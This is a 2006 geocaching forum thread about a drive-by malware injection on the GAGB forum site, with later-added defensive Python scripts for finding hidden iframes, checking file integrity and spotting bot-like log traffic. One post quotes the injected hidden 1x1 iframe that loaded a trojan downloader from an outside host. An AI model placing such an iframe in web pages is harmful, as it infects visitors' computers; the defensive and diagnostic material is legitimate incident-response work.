+TheRoundings Posted November 10, 2006 (edited) I see that the site link: http:// www.gagb.org.uk/forum (note space included so as to break the link) is spawning: http:// zebxmzbsx.biz/dll/adv631.php (again space included so as to break the link) which is calling an image called: xpladv631[1].wmf This is blocked by my browser and is not something related to just my computer. This happens on two colleagues' computers also. Does anyone know what this is? Is it a virus? I am concerned to visit the forums again on the GAGB site until I know what this is. Duncan EDIT: Update - this image is seen as a Trojan by McAfee VirusScan in my virus scanning logs. Edited November 10, 2006 by TheRoundings
+mongoose39uk Posted November 10, 2006 Are your colleagues on the same network? Cannot see a problem from here!
+Tiger-Eyes Posted November 10, 2006 I have the GAGB forums on constantly as one of my pages on Opera. I have just run a virus scan to double check but nothing has been detected (I use Norton Internet security protection).
NickPick Posted November 10, 2006 My Symantec AV is reporting the same problem. It appears to be trying to open a .wmf file, and my AV is reporting it as a Downloader. It's probably not showing up in Opera as it's probably an IE only problem.
+TheRoundings Posted November 10, 2006 Author (edited) Initially I was at work. I've now got home and tried from here and the same occurs. If you're not quick you will not see it. It only happens with the first session of GAGB in your browser, or at least until the file is cached. Close your browser, open again, then go to http:// www.gagb.org.uk/forum. After a short while the page is redirecting to http:// www.gagb.lunarpages.com/forum/ which is normal, then after a short duration you can see a load from http:// zebxmzbsx.biz/dll/adv631.php This happens only after opening your browser and navigating the first time. Edit: This happens with FF2.0 and IE7. Edited November 10, 2006 by TheRoundings
+rutson Posted November 10, 2006 Yep, here's the offending code (line 247 of the index page): <iframe src="http://zebxmzrbsx.biz/dl/adv631.php" width=1 height=1></iframe> Looks to me like it's been hacked, though it's hardly surprising given the forum software is three years old and has a list of possible ways to attack it as long as your arm.
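The injected tag rutson quotes has the two tell-tale features of a drive-by iframe: it points at a host the site never uses, and it is sized 1x1 so it stays invisible. A site owner can check a page for both before a visitor's AV has to. The following is an added example written for this thread, not code from the GAGB site or from Invision; the sample page is constructed, the off-site host name is a placeholder, and the list of trusted hosts is an assumption taken from the hosts mentioned earlier in the thread.

```python
"""Find injected hidden iframes in a page's HTML.

Added example; this is not the GAGB forum's code or Invision's. The sample
page below is constructed and the off-site host name is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the site legitimately embeds content from (assumption for this example).
TRUSTED_HOSTS = {"www.gagb.org.uk", "www.gagb.lunarpages.com"}


class IframeCollector(HTMLParser):
    """Record every <iframe> start tag with its attributes and source line number."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            line, _ = self.getpos()
            self.iframes.append((line, {k: (v or "") for k, v in attrs}))


def _is_tiny(value):
    """True when a width/height attribute is at most 1 pixel."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except ValueError:
        return False


def find_suspicious_iframes(html, trusted_hosts=TRUSTED_HOSTS):
    """Return [(line, src, reasons)] for iframes that point off-site or are hidden."""
    collector = IframeCollector()
    collector.feed(html)
    findings = []
    for line, attrs in collector.iframes:
        src = attrs.get("src", "")
        host = urlparse(src).hostname
        reasons = []
        if host and host not in trusted_hosts:
            reasons.append("external host " + host)
        if _is_tiny(attrs.get("width", "")) and _is_tiny(attrs.get("height", "")):
            reasons.append("1x1 or smaller")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            reasons.append("hidden by style")
        if reasons:
            findings.append((line, src, reasons))
    return findings


# Constructed sample: one legitimate embed, one 1x1 iframe pointing off-site.
SAMPLE_PAGE = """<html><body>
<h1>Forum index</h1>
<iframe src="http://www.gagb.lunarpages.com/forum/" width="600" height="400"></iframe>
<p>Latest posts...</p>
<iframe src="http://malware-host.invalid/dl/adv.php" width=1 height=1></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, src, reasons in find_suspicious_iframes(SAMPLE_PAGE):
        print("line %d: %s (%s)" % (line, src, ", ".join(reasons)))
```

Run it against the HTML the server actually serves (fetched as a visitor would see it) rather than the template files alone, because as the thread goes on to show the injection lived in the database, not in a file.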
+mongoose39uk Posted November 10, 2006 Yep, found it now. Will get Teasel onto it.
+TheRoundings Posted November 10, 2006 Author Please post back on this thread when it's removed so we know it's safe again.
+CrazyL200 Posted November 10, 2006 VIRUS Detected - called Exploit. Fortunately my AV software stopped it downloading some picture or another, but crashed IE, then the PC in the process.
+Haggis Hunter Posted November 10, 2006 No offence meant towards GAGB, but I have just spent £200 after my PC crashed and melted. I have just deleted their forums from my bookmark list. I don't want to click on it by accident!!
+Bill D (wwh) Posted November 11, 2006 We're aware of this. I'm quite au fait with the website, but Invision and MySQL aren't my line - I spent an age last night trying to find the problem, but with no success. Ian (Teasel), who's our webmaster, seems to be away at the moment and we can't get hold of him, so it looks as if we're stuck with this until he comes back. If you're using an up-to-date AV program and a firewall this shouldn't be a problem. If you're not, you really should be. --- Bill, Chairman GAGB
+Bill D (wwh) Posted November 11, 2006 The problem is now sorted. Many thanks to Barry Hunter, who very kindly offered to take a look, and has now found the offending code and removed it. Many thanks indeed, Barry! --- Bill, Chairman GAGB
+kewfriend Posted November 11, 2006 In setting a recent cache I found that a perfectly innocent local tourist type website had also been penetrated and was shipping out a trojan. Hmmmm, this will make it more diff to do the cache grrrr
Team 'James W' Posted November 12, 2006 ....Get an Apple Mac!! Not helpful, I know. Sorry! <Tongue-in-cheek smugness is sure to come back and bite me one day>
+mongoose39uk Posted November 12, 2006 Can Mac run GSAK without a Windows emulator?
+The Bolas Heathens Posted November 12, 2006 (edited) Yes - the new Intel ones can. I do it all the time and can run any Windows application on my Mac desktop without using an emulator. I was just wondering, does the issue just affect IE users or does it affect Firefox too? Can Mac run GSAK without a Windows emulator? Edited November 12, 2006 by The Bolas Heathens
+TheRoundings Posted November 12, 2006 Author FF and IE were affected. It was nothing to do with the browser. Another page was automatically called after the main forum page which tried to load a Trojan Windows metafile image. The security settings in each browser could've restricted it, however most people relax their settings for more convenient browsing. In this case it was an easy catch for anyone with up-to-date virus checking.
+The Blorenges Posted November 15, 2006 Don't go there! They've come back again! MrsB
+Dorsetgal & GeoDog Posted November 15, 2006 Virus mid election? Coincidence or what?
+mongoose39uk Posted November 15, 2006 Election? That finished last week. I have emailed Barry to ask him if he can take a look and clear it up again. Thanks for letting us know Mrs B. Any spare bread for Bet btw.
barryhunter Posted November 15, 2006 (edited) Sorry, never received any email, but opening up the database now... Edit: ahh, only just realised how soon I happened to check the forum, the email was still flying through the interweb. Anyway: the injected code has been removed, including the most basic of inoculation, but I can forward findings to hopefully plug the hole! Edited November 15, 2006 by barryhunter
+drsolly Posted November 15, 2006 A couple of years ago, The Register (an online tech newsletter that I read most days) was hit by a "driveby". It was actually in their advertising, which is outsourced, but that's no comfort. Just by accessing the relevant advert(s) (which you had no choice in), an "iframe exploit" was installed on your computer (translation, a bunch of horrible was installed on your computer), which was really really difficult to remove (recommended method - reformat your disk and reinstall Windows). It was after that, that I decided that using Internet Explorer (and Outlook) was just too difficult for me, and I switched. Many people use the Firefox browser, which seems to suffer from fewer of such problems. I went the whole hog, and dropped Windows in favour of Linux. This also means that I don't use (or, probably, need) an antivirus. Another part of the problem is false alarms, such as this one: http://news.com.com/Microsoft+flags+Gmail+..._3-6135154.html Currently, I'm getting sent maybe a dozen viruses (or trojans, or, well, I don't care) per day in my email, and heaven knows what horriblenesses I'm accessing on the web, but it's all water off a geocacher's back, because they're all Windows-oriented. Recommendation - check out Firefox, or any other browser that isn't Internet Explorer, because it's IE that the black hats are targeting. Disclaimer - I no longer have any financial interest in any antivirus company.
+Bill D (wwh) Posted November 15, 2006 I've only just seen this - I've been out since early afternoon. Barry, many thanks once again!!!
+The Blorenges Posted November 18, 2006 Remember... I'm just the messenger... It's back! MrsB
+sTeamTraen Posted November 18, 2006 Most of the nasties seem to be written in Javascript and will have a fighting chance of working on Firefox as well. However, their binary payloads won't work on Linux. I've just been put in charge of the network security team at work and I'm reviewing our site filtering policies. Currently we have an ineffectual 7-year-old list of porn sites and we block assorted malware providers as we detect them. But I'm thinking of just blocking *.biz and seeing if anyone calls!
barryhunter Posted November 18, 2006 (edited) ... I thought I had posted this about 12.30, but it got lost with the dodgy internet connection (it was still open in the text editor used for spell checking) ... Arrg! Gone again. Interestingly it looks like it's a person manually cracking into it, as they adapted to get round the inoculation I applied. (It could be an automated virus breaking in, but the change is a definite shift in what was happening.) If I get a chance over the weekend I will have a look at the logs to see if I can spot how it's happening... Edited November 18, 2006 by barryhunter
Edgemaster Posted November 18, 2006 (edited) Get the forum software upgraded. One entry point in PHP can give a cracker full access to the webserver it's hosted on. I should also add that once someone has one access point they'll quite often add backdoors in. Best way to go is to make sure you have clean copies of configuration and any template changes made and do a reinstall; nasty stuff can hide in there. Edited November 18, 2006 by Edgemaster
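Edgemaster's point is that removing the visible iframe is not the same as removing the attacker: anything else they dropped on the server stays. A clean copy gives you something concrete to diff against. The script below is an added example of that check, written for this thread rather than taken from the GAGB site or its forum software: it records a SHA-256 manifest of a known-good tree, then reports files that were modified, files that appeared (where a backdoor would show up) and files that went missing. The directory layout and file contents are constructed for the demonstration, and treating config.php as a file the administrator is allowed to edit is an assumption.

```python
"""Compare a deployed web tree against a manifest of known-good file hashes.

Added example illustrating the 'clean copies and reinstall' advice; it is not
code from the GAGB site or its forum software. The directory layout and file
contents are constructed for the demonstration, and config.php is treated as
a file the site administrator is allowed to edit (an assumption).
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path):
    """Hex SHA-256 of a file, read in chunks so large uploads need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """Map relative path -> SHA-256 for every regular file under root."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file()
    }


def compare_to_manifest(root, manifest, allowed_to_change=("config.php",)):
    """Classify files as modified, added (possible backdoors) or missing versus the manifest."""
    current = build_manifest(root)
    report = {"modified": [], "added": [], "missing": []}
    for rel, good_hash in manifest.items():
        if rel not in current:
            report["missing"].append(rel)
        elif current[rel] != good_hash and rel not in allowed_to_change:
            report["modified"].append(rel)
    report["added"] = [rel for rel in current if rel not in manifest]
    return report


def demo():
    """Build a constructed clean install, record its manifest, then simulate a compromise."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "templates").mkdir()
        (root / "index.php").write_text("<?php echo 'forum'; ?>\n")
        (root / "config.php").write_text("<?php $db_pass = 'original'; ?>\n")
        (root / "templates" / "header.html").write_text("<h1>Forum</h1>\n")
        manifest = build_manifest(root)  # what a clean copy would give you

        # Simulated tampering: an injected iframe, an unexpected new PHP file,
        # and a legitimate password rotation in config.php.
        (root / "index.php").write_text(
            "<?php echo 'forum'; ?>\n"
            '<iframe src="http://malware-host.invalid/x.php" width=1 height=1></iframe>\n'
        )
        (root / "uploads").mkdir()
        (root / "uploads" / "unexpected.php").write_text("<?php /* constructed placeholder */ ?>\n")
        (root / "config.php").write_text("<?php $db_pass = 'rotated'; ?>\n")
        return compare_to_manifest(root, manifest)


if __name__ == "__main__":
    print(demo())
```

Keep the manifest somewhere the web server cannot write to; a manifest stored in the web root can be edited by the same access that edited the files. Directories where users are meant to upload content should be checked separately for executable file types rather than for exact hashes.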
+Bill D (wwh) Posted November 18, 2006 (edited) Barry, many thanks for helping out again! Edgemaster, yes, all that sounds like a good idea, but it's not my pigeon - it'll have to wait for Ian (Teasel). Edit: I forgot to say that I was beginning to wonder if it was someone doing it manually... Edited November 18, 2006 by Bill D (wwh)
+Geotrotters Posted November 18, 2006 Yes - the new Intel ones can. I do it all the time and can run any Windows application on my Mac desktop without using an emulator. I was just wondering, does the issue just affect IE users or does it affect Firefox too? Can Mac run GSAK without a Windows emulator? Yes, you're running them without an emulator but you're still having to use Windows (using Boot Camp or Parallels). This will still leave you open to viruses in your Windows applications as it's the Mac OS X operating system that's safe, not the Windows install that's sitting on top of it. The one plus point is that Parallels runs Windows in a virtual machine so the virus will only affect the Windows install and not the complete Mac software.
+The Blorenges Posted November 20, 2006 Is it safe to go back yet? MrsB
+Bill D (wwh) Posted November 20, 2006 (edited) It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too. I use the free versions of Avast antivirus and Zone Labs firewall. I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think Ff stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all. Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates. Edited November 20, 2006 by Bill D (wwh)
+kewfriend Posted November 20, 2006 Is it safe to go back yet? MrsB It is until they release JAWS2
+stora Posted November 20, 2006 (edited) It is at the moment... But any website is liable to get hacked, so make sure you're using an up-to-date antivirus program, and preferably a personal firewall too. I use the free versions of Avast antivirus and Zone Labs firewall. I continued to visit the GAGB forums during the periods the virus was there, and had no problems. I'm using Firefox, and I think Ff stopped the link opening, as I accessed the forums on my sister's computer using IE and Avast stopped the virus. On mine Avast never got to see the virus as it didn't get to me at all. Edit to add: And make sure your antivirus and firewall are updated regularly - I have Avast and Zonelabs set to check automatically for updates. Doesn't sound very reassuring. I'll let MrsB go first and report if all is clear. Edited November 20, 2006 by stora
+The Blorenges Posted November 20, 2006 I've just come back from there... It seems OK at the moment... MrsB
+The Blorenges Posted November 20, 2006 Joking aside... Just went back to GAGB and once again McAfee is immediately giving me pop-ups of Trojans and potentially harmful scripts being removed. I've never come across this before on any of the other sites that I drop into. McAfee is obviously "doing its stuff" and protecting my pc but I'm not inclined to hang around on the site knowing that it's regularly being infected. I won't be back until I feel confident that it's been properly cleaned up. MrsB
barryhunter Posted November 20, 2006 I can certify it clean now, and I am now able to actually devote time to diagnosing the problem rather than cut and run. It looks like it should be patchable until the software can be upgraded.
+Bill D (wwh) Posted November 20, 2006 Barry, many thanks for helping us out yet again!
+Alice Band Posted November 21, 2006 (edited) I visited the site tonight and my Anti-Virus went mad. Hmmm, judging by the speed and method that things are being re-inserted I wonder if the cause of it is reading this thread. Can you track some of the traffic? Surely this form of attack is manual, not bot? I still remember the porn attacks this forum had recently - someone with a grudge? Edited November 21, 2006 by Alice Band
barryhunter Posted November 21, 2006 It is removed, but as Bill mentioned AV should be installed as per the course (but a sad course of affairs!) anyway. I should add that I have now been able to track at least one very suspicious access. It 'browsed' the site too quick to be a real person, almost certainly a bot visiting. I've blocked that computer and also installed tracking to get much more verbose info if it should happen again. (Previously I've been able to do little more than remove the naughty-code each time, nothing to really stop it happening again, but now I've been able to learn about the GAGB website.)
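The tell-tale barryhunter describes, a client that walks the site faster than anyone could read it, is something the ordinary web server access log can surface without any extra tracking. The script below is an added example of that check and is not the tracking he installed or any code from the GAGB site: it parses Apache combined-format lines, ignores stylesheet and image fetches (every browser grabs those in a burst, so counting them would flag real visitors), and reports clients whose page requests arrive on average less than a second apart. The log lines are constructed, use documentation-reserved IP addresses, and the thresholds are assumptions to tune against your own traffic.

```python
"""Spot clients that 'browse' a site faster than a person could, from web server logs.

Added example; it is not the tracking barryhunter installed and not code from
the GAGB site. The log lines are constructed in Apache combined format and use
documentation-reserved IP addresses. Thresholds are assumptions for this example.
"""
import re
from collections import defaultdict
from datetime import datetime

COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)
# Static assets are fetched in bursts by every browser, so only page hits are counted.
ASSET_RE = re.compile(r'\.(?:css|js|gif|jpe?g|png|ico)(?:\?|$)', re.IGNORECASE)


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    parts = rec["req"].split()
    rec["path"] = parts[1] if len(parts) >= 2 else ""
    return rec


def find_bot_like_clients(lines, min_page_hits=5, max_avg_gap_seconds=1.0):
    """Return {ip: (page_hits, avg_gap_seconds)} for clients whose page requests
    arrive, on average, faster than max_avg_gap_seconds apart."""
    hits = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or ASSET_RE.search(rec["path"]):
            continue
        hits[rec["ip"]].append(rec["time"])

    flagged = {}
    for ip, times in hits.items():
        if len(times) < min_page_hits:
            continue
        times.sort()
        span = (times[-1] - times[0]).total_seconds()
        avg_gap = span / (len(times) - 1)
        if avg_gap <= max_avg_gap_seconds:
            flagged[ip] = (len(times), avg_gap)
    return flagged


# Constructed sample log: one client walks six forum pages in two seconds,
# another reads five pages over seven minutes (plus a stylesheet fetch).
SAMPLE_LOG = """\
203.0.113.5 - - [15/Nov/2006:02:14:01 +0000] "GET /forum/index.php HTTP/1.1" 200 18233 "-" "Mozilla/4.0"
203.0.113.5 - - [15/Nov/2006:02:14:01 +0000] "GET /forum/index.php?showforum=3 HTTP/1.1" 200 9120 "-" "Mozilla/4.0"
203.0.113.5 - - [15/Nov/2006:02:14:02 +0000] "GET /forum/index.php?showtopic=101 HTTP/1.1" 200 7002 "-" "Mozilla/4.0"
203.0.113.5 - - [15/Nov/2006:02:14:02 +0000] "GET /forum/index.php?showtopic=102 HTTP/1.1" 200 6870 "-" "Mozilla/4.0"
203.0.113.5 - - [15/Nov/2006:02:14:03 +0000] "GET /forum/index.php?showtopic=103 HTTP/1.1" 200 7110 "-" "Mozilla/4.0"
203.0.113.5 - - [15/Nov/2006:02:14:03 +0000] "GET /forum/index.php?showtopic=104 HTTP/1.1" 200 6950 "-" "Mozilla/4.0"
198.51.100.7 - - [15/Nov/2006:02:10:00 +0000] "GET /forum/index.php HTTP/1.1" 200 18233 "-" "Mozilla/5.0 Firefox/2.0"
198.51.100.7 - - [15/Nov/2006:02:10:00 +0000] "GET /forum/style.css HTTP/1.1" 200 4120 "-" "Mozilla/5.0 Firefox/2.0"
198.51.100.7 - - [15/Nov/2006:02:11:30 +0000] "GET /forum/index.php?showtopic=101 HTTP/1.1" 200 7002 "-" "Mozilla/5.0 Firefox/2.0"
198.51.100.7 - - [15/Nov/2006:02:13:05 +0000] "GET /forum/index.php?showtopic=102 HTTP/1.1" 200 6870 "-" "Mozilla/5.0 Firefox/2.0"
198.51.100.7 - - [15/Nov/2006:02:15:40 +0000] "GET /forum/index.php?showtopic=103 HTTP/1.1" 200 7110 "-" "Mozilla/5.0 Firefox/2.0"
198.51.100.7 - - [15/Nov/2006:02:17:00 +0000] "GET /forum/index.php?showtopic=104 HTTP/1.1" 200 6950 "-" "Mozilla/5.0 Firefox/2.0"
"""

if __name__ == "__main__":
    for ip, (count, gap) in find_bot_like_clients(SAMPLE_LOG.splitlines()).items():
        print("%s: %d page hits, %.2fs average gap" % (ip, count, gap))
```

Treat a hit from this as a lead to read the full request history for that address, not as proof on its own: search engine crawlers and a group of people behind one proxy produce the same shape, and a patient attacker can simply slow down. The value of the log is in what the flagged client requested, which is where the entry point is likely to show.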
nobby.nobbs Posted November 21, 2006 I've been there regularly without (touch wood) problems. Please keep coming as the site has been much better recently due to all the people participating in the forums. Plus a UK off topic play area!
+Haggis Hunter Posted November 21, 2006 I still remember the porn attacks this forum had recently - someone with a grudge? DAM.N I must have missed that!!
+Alice Band Posted November 21, 2006 I should add that I have now been able to track at least one very suspicious access. It 'browsed' the site too quick to be a real person, almost certainly a bot visiting. I've blocked that computer and also installed tracking to get much more verbose info if it should happen again. A well-done for all your hard work Barry. Hopefully this is the last we hear of it.